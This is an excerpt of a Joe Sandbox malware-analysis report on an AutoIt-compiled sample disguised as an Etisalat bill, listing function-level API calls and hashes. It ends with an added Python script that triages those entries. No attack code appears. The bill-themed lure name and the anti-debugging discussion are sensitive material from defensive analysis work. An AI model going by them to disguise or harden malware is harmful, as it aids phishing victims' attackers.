                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 857dbcf1c54bcc44aa3e46e8b106321f21578fd0e4cee57a5e13e5c765d35e3c
                                      • Instruction ID: 32da3569a08b892c0f7c897d67f9cce18228faa1413707a28dc31dd0ff78de3a
                                      • Opcode Fuzzy Hash: 857dbcf1c54bcc44aa3e46e8b106321f21578fd0e4cee57a5e13e5c765d35e3c
                                      • Instruction Fuzzy Hash: 7BE06132A0022D17D3209A999C45FE7F7ECEB41B31F00016BFD14D7050D5709E4587E0
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00BB81CA
                                        • Part of subcall function 00B83598: _doexit.LIBCMT ref: 00B835A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 3c951462dfeb9b1c8f7e4394e49dbc5cd10aa68177c9694073693d977b0e0272
                                      • Instruction ID: 9d6c80f17eb1e151364c41a70da43e4ca5bb7104ea6255a27fb24b024856237d
                                      • Opcode Fuzzy Hash: 3c951462dfeb9b1c8f7e4394e49dbc5cd10aa68177c9694073693d977b0e0272
                                      • Instruction Fuzzy Hash: AFD0123228536836D21532A86C06BD676CCCB15F51F0048A5BB085A5E3CED559828299
                                      APIs
                                        • Part of subcall function 00B9B564: _memset.LIBCMT ref: 00B9B571
                                        • Part of subcall function 00B80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B9B540,?,?,?,00B6100A), ref: 00B80B89
                                      • IsDebuggerPresent.KERNEL32(?,?,?,00B6100A), ref: 00B9B544
                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B6100A), ref: 00B9B553
                                      Strings
                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B9B54E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                      • API String ID: 3158253471-631824599
                                      • Opcode ID: f720a6dae76cf5fe4230d66d8db955dd1649ca9b12bf9a17053476c0dcf3b9aa
                                      • Instruction ID: 04e7dc96811a1aeb1b13f72199f506df7afa3a1f9b358b38eb109712a7475477
                                      • Opcode Fuzzy Hash: f720a6dae76cf5fe4230d66d8db955dd1649ca9b12bf9a17053476c0dcf3b9aa
                                      • Instruction Fuzzy Hash: B0E092B0610351CFDB20EF28E518B467BE0AF14755F0189BCE456C77A1DBB4D408CB61
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BE5BF5
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BE5C08
                                        • Part of subcall function 00BC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                       • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: d6f5d51017cc859a7984f247bea9141ada3390bc01946b3b4aca2fd5d36ebda8
                                      • Instruction ID: 579ea6c66b89148c01ae948233a9da7adc0f89d0de2507d8b2828170dfafa7f9
                                      • Opcode Fuzzy Hash: d6f5d51017cc859a7984f247bea9141ada3390bc01946b3b4aca2fd5d36ebda8
                                      • Instruction Fuzzy Hash: F2D0C931388352BBE778AB70AC4BFE76A54AB51B51F100839B645AA1D1D9E4A880C654
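The function entries above are the Joe Sandbox IDA plugin's per-function summaries: the API calls with their string arguments and call-site addresses, the strings referenced, and the Similarity IDs that let one entry be matched against entries from other samples. When reading them, the IsDebuggerPresent / OutputDebugStringW pair around "ERROR : Unable to initialize critical section in CAtlBaseModule" deserves a caveat: that sequence is the failure path of ATL's CAtlBaseModule constructor, library code statically linked into the AutoIt runtime, so it is one source of the "Checks if the current process is being debugged" signature that says nothing about the script author's own anti-analysis logic. The Python script below is an added example, not code from the Joe Sandbox report or from AutoIt: it parses entries in this layout, decodes the numeric uMsg argument of SendMessageW / PostMessageW calls (0x0111 is WM_COMMAND, 0x0182 is LB_DELETESTRING, both from winuser.h) and tags the entry. The sample input is two of the entries above trimmed to the sections the parser reads; the tag names and the `parse_entries` / `triage` function names are this example's own assumptions.

```python
"""Parse Joe Sandbox IDA-plugin function entries and triage them.

Added example; not code from the Joe Sandbox report or the AutoIt runtime.
Section names follow the report layout; tag names are this script's own.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Input: two of the function entries from the report, trimmed to the
# sections the parser reads (Memory Dump Source and opcode hashes dropped).
SAMPLE = """\
APIs
  • Part of subcall function 00B9B564: _memset.LIBCMT ref: 00B9B571
  • Part of subcall function 00B80B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B9B540,?,?,?,00B6100A), ref: 00B80B89
• IsDebuggerPresent.KERNEL32(?,?,?,00B6100A), ref: 00B9B544
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B6100A), ref: 00B9B553
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B9B54E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• API String ID: 3158253471-631824599
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BE5BF5
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BE5C08
  • Part of subcall function 00BC54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• API String ID: 529655941-2988720461
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "<Name>.<Module>(<args>), ref: <addr>", optionally prefixed by the
# "Part of subcall function <addr>:" marker; calls listed without an
# argument list (e.g. "_doexit.LIBCMT ref: ...") have no parentheses or comma.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")

# Window-message constants (winuser.h) for the uMsg values seen in these entries.
MSG_NAMES = {0x0111: "WM_COMMAND", 0x0182: "LB_DELETESTRING"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # address of the callee the call sits in, if any


@dataclass
class Entry:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    similarity: dict = field(default_factory=dict)


def parse_entries(text: str) -> List[Entry]:
    """Split plugin output into entries; each entry begins with its APIs block."""
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                cur = Entry()
                entries.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur.apis.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            cur.strings.append(body.split(", xrefs:")[0])
        elif section == "Similarity":
            key, _, val = body.partition(": ")
            cur.similarity[key] = val
    return entries


def triage(entry: Entry) -> List[str]:
    """Tag an entry with what it most likely is (tag names are assumptions)."""
    names = {c.name for c in entry.apis}
    args = [a for c in entry.apis for a in c.args]
    tags = []
    # IsDebuggerPresent followed by OutputDebugStringW of this exact string is
    # the failure path of ATL's CAtlBaseModule constructor: runtime library
    # code, not anti-debugging written by the script author. Weight it low.
    if {"IsDebuggerPresent", "OutputDebugStringW"} <= names and any(
            "CAtlBaseModule" in s for s in entry.strings):
        tags.append("atl-runtime-boilerplate")
    if "FindWindowW" in names and "Shell_TrayWnd" in args:
        tags.append("taskbar-window-message")
    for c in entry.apis:  # decode uMsg (second argument) of message sends
        if c.name in ("SendMessageW", "PostMessageW") and len(c.args) > 1:
            try:
                msg = int(c.args[1], 16)
            except ValueError:
                continue
            label = MSG_NAMES.get(msg, f"0x{msg:04X}")
            tags.append(f"{c.name}:{label}")
    return tags
```

Run it over a whole report's function list rather than the two trimmed entries and the `API String ID` values give a cheap way to diff the runtime's entries (present in every compiled AutoIt binary) from the few that carry the script's own behaviour.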